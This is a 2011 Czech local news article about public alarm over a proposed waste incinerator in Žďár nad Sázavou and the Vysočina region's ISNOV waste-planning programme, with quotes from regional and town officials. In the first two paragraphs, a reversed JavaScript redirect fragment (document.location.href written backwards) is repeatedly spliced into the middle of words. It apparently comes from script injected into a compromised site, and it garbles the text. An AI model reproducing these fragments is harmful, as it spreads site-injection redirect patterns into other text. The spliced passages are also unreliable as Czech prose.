Žďár nad Sázavou, zdar nad sazavou, aktuality, spalovna
Rainbow page separator

Zvažovaná spalovna budí u žďárské veřejnosti silné emoce

Úterý, 29. listopadu 2011

Žďár nad Sázavou/ Velmi silné emoce obyvatel budí zvažovaná spalovna odpadu v Kraji Vysočina. Jak nedávno uvedl pro Žďárský deník Zdeněk Ryšavý, krajský radní pro oblast informatiky, životního prostředí a územního plánování, jednou z možností umístění spalovny je [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totiž vedle Jihlavy právě také Žďár nad Sázavou. Od chvíle, kdy se ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to informace dostala na veřejnost, plní se žďárská interne[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tová „dotazovna“ vyděšenými otázkami a názory obyvatel.
Skutečnost, že by byla vybudována právě spalovna a navíc zrovna v okresním městě, ale není zatím jistá. „Všechno má svůj čas, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to zejména v tak závažné a zásadní věci, jako je spalovna komunálního odpadu. Občané se zavčas všechno potřebné dozví v Krajem Vysočina chystaných veřejných diskusích s odborníky na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to téma, neboť právě kraje jsou v rámci celé České republiky zodpovědné za vyřešení té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to problematiky na svém území,“ vyjádřil se k dotazu jednoho z obyvatel města Jaromír Brychta, 1. žďárský mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta. Ten Žďár nad Sázavou v programu Integrovaného systému nakládání s odpady v Kraji Vysočina (ISNOV) zastupuje, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to společně se členem zastupitelstva Miloslavem Odvárkou.
Problematikou ISNOV se vedení kraje zabývá již delší dobu. V první polovině roku 2010 zastupitelstva kraje a 15 měst s rozšířenou působností projednala a schválila návrh smlouvy o spolupráci na přípravě ISNOV, která byla slavnostně podepsána dne 1. června 2010 na Krajském úřadu Kraje Vysočina. Následovalo vytvoření řídící rady, tvořené zástupci všech smluvních stran a bylo vypsáno výběrové řízení na zpracovatele podrobných analýz a závěrečné studie, která doporučí reálné varianty ISNOV. Výsledky budou projednány ve všech zastupitelstvech – kraje i měst, účastnících se projektu. Ta  vyberou a schválí nejvhodnější variantu ISNOV.